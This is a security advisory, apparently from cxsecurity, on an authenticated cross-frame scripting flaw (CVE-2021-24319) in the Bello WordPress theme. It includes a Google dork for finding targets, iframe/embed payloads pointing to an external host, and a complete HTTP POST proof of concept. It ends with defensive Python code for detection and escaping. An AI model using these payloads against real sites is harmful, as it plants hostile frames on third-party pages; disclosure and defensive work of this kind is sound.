Bello WordPress Theme <= 1.5.9 - Authenticated XFS

2021.05.17
m0ze (RU)
Risk: Low
Local: No
Remote: Yes
CWE: CWE-1021

/*!
 - # VULNERABILITY: Bello WordPress Theme <= 1.5.9 - Authenticated XFS
 - # GOOGLE DORK: inurl:/wp-content/themes/bello/
 - # DATE: 2021-03-21
 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
 - # VENDOR: BoldThemes [ https://bold-themes.com ]
 - # SOFTWARE VERSION: <= 1.5.9
 - # SOFTWARE LINK: https://themeforest.net/item/bello-directory-listing-wordpress-theme/21815903
 - # CVSS: AV:N/AC:L/PR:L/UI:R/S:C
 - # CWE: CWE-1021
 - # CVE: CVE-2021-24319
*/

### -- [ Info: ]

[i] An Authenticated XFS (cross-frame scripting) vulnerability was discovered in the Bello theme through v1.5.9 for WordPress.
[i] Vulnerable parameter(s): &post_excerpt.
[i] Plugin(s) affected: Bello by BoldThemes [ https://bold-themes.com ].

### -- [ Impact: ]

[~] Malicious iframe injection and the ability to chain further attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]

[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html>
[$] <!--><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>

### -- [ PoC | Authenticated XFS | My Listings: ]

[!]
POST /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 HTTP/1.1
Host: bello.bold-themes.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------16118302073611242382926219402
Content-Length: 13779
Referer: https://bello.bold-themes.com/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
Cookie: [user cookies]

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="action"

ajax_submit
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_form_config"

5d63602a0e2f80c83196bc5ea6405fca
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_title"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_content"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_excerpt"

</textarea><!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html> <iframe src=https://m0ze.ru/payload/xfsii.html></iframe>
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="nonce_listing_cf"

e1c3b088fu
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_wp_http_referer"

/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-location_position"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-region"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_from"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_to"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_free"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_address"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_phone"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_mobile"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_email"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_website"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_price"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_description"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_facebook"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_twitter"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_instagram"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_google_plus"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_pinterest"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_tripadvisor"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_youtube"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-faq"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_free_wifi"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_air_conditioned"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_featured"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_exterior"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_interior"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_pools"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_beach"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_spa"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_sound"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_1"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_2"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_3"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_1"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[0]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[1]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[2]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[3]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[4]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[5]"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-bello-listing-package"

bello-default-package
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_form_email"

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_restaurant"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_non_smoking_rooms"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

49
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_submit"

1
-----------------------------16118302073611242382926219402--

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
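The PoC above submits a listing whose post_excerpt starts with </textarea> and then frames an external page. The following is an added example, not part of the advisory or the theme: it extracts the fields from a multipart listing submission like the one shown, flags an excerpt that would break out of a textarea and embed a foreign origin, and contrasts raw interpolation with the output encoding that neutralises it. It assumes the excerpt is re-rendered inside a textarea on the edit form (the leading </textarea> in the payload points that way); the boundary, field values and URL are constructed.

```python
"""Added example, not the theme's code: multipart field extraction, a detection
rule for textarea breakout / frame injection, and textarea-context escaping.
Assumption: the stored post_excerpt is echoed back inside a <textarea>."""
import html
import re

# Constructed sample body modelled on the PoC (short boundary, placeholder URL).
BOUNDARY = "----xfsdemo"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="action"\r\n\r\najax_submit\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="post_excerpt"\r\n\r\n'
    '</textarea><!-->"><!--><embed src=https://attacker.invalid/frame.html>\r\n'
    f"--{BOUNDARY}--\r\n"
)

# Closing a textarea early, or any element that can frame another origin.
FRAME_INJECTION = re.compile(r"</textarea\s*>|<\s*(iframe|embed|object|frame)\b", re.I)


def parse_multipart(body: str, boundary: str) -> dict:
    """Map field name -> value for a multipart/form-data body (no file parts)."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble or the closing "--" delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', headers)
        if name:
            fields[name.group(1)] = value
    return fields


def flags_frame_injection(value: str) -> bool:
    """Server-side validation / WAF rule to apply to free-text listing fields."""
    return bool(FRAME_INJECTION.search(value))


def render_excerpt_unsafe(excerpt: str) -> str:
    """The vulnerable pattern: the stored value is interpolated raw into the form."""
    return f'<textarea name="post_excerpt">{excerpt}</textarea>'


def render_excerpt_safe(excerpt: str) -> str:
    """Hardened form: HTML-escape the value (what WordPress's esc_textarea() does),
    so the injected </textarea> and <embed> become inert text."""
    return f'<textarea name="post_excerpt">{html.escape(excerpt, quote=True)}</textarea>'
```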

References:

https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-1021%5D-Bello-WordPress-Theme-v1.5.9.txt
https://twitter.com/vladm0ze


Copyright 2021, cxsecurity.com